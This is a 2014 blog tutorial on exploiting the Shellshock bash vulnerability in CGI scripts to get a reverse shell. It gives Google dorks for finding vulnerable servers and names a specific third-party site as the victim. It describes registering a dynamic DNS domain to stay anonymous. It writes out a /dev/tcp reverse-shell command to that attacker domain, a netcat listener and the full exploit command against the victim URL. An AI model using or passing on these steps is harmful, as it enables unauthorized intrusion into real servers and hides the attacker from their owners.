Saturday, 27 September 2014

How to exploit a shellshock vulnerability to get a reverse shell

bash shellshock exploit

In this tutorial, i would show how to exploit a BASH Shellshock vulnerability successfully and getting a reverse shell while keeping ourself anonymous.

Who is vulnerable to shellshock??:

CGI scripts using bash variables or commands and CGI scripts written in bash can be exploited remotely. Moreoever, any service listeing on a port and using bash script or its variables in its coding can also be exploited using this vulnerability.

Requirements:

1- Shellshock vulnerable victim
2- Router or USB modem having port forwarding Feature
3- Download exploit for shellshock from here
4- Netcat
5- PHP

Google Dorks:

We can find our vulnerable victim using google dorks. Mostly, all cgi scripts written in bash uses a .sh file extension. So, following google dorks can given you good results.

inurl:/cgi-bin/ ext:sh
inurl:/cgi-bin/ ext:cgi

Vulnerable Victim:

In our tutorial victim is following domain:

http://supreme.adisseolabservice.com/cgi-bin/wslb.sh

Port Forwarding:

Open your router or usb modem settings and forward port 4444 for your LAN IP.

noip Domain for anonymity: 

This step is optional and it just provides a little bit more anonymity in our penetration testing scenario.
1- Visit noip.com and register an account.
2- Now go in your account and go in Manager Hosts. There add free domain name with your public IP.
This setting will take almost 1 minute to apply. After one minute you can ping your domain name and can verify that it is resolving to your public IP. Now we will use this domain name for our reverse shell.  
Here i have registerd a domain logon.myftp.org for getting a reverse shell.
So lets perform it.

/dev/tcp Linux Native Reverse Shell:

We will try to use the /dev/tcp for reverse shell because every linux system have it.

/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1

OR

/bin/bash -i >& /dev/tcp/UR_PUBLIC_IP/4444 0>&1

NOTE: forward your port 4444 for your LAN IP otherwise it won't work for you.

Verification of vulnerable victim:

Open CMD and go in the directory where you downloaded the exploit from exploit-db.
Now type following command to run this exploit.
php bash_mod_cgi_script.php
It will show u an out saying that give me url and command.
So use the above given URL of victim and try to use any linux system command i.e. ls, whoami etc.
If you see command sent to server then it means server is receiving our command but it can't send back any response. 

shellshock vulnerable response

So, lets try to do a work around and get a reverse shell.

Netcat Reverse Shell Handler:

Now we need to run netcat listening on a port so that we may get a reverse shell.So, start a netcat listening on ur system with this command:
nc -lp 4444 -vv
-vv is used for verbosity and more information
-l is for listening with netcat
-p is used for a custom port on which we want to listen

Now we are all set, just run the following command and wait untill you receive a reverse shell on your netcat reverse handler.
php bash_mod_cgi_script.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1"

Watch Video Tutorial: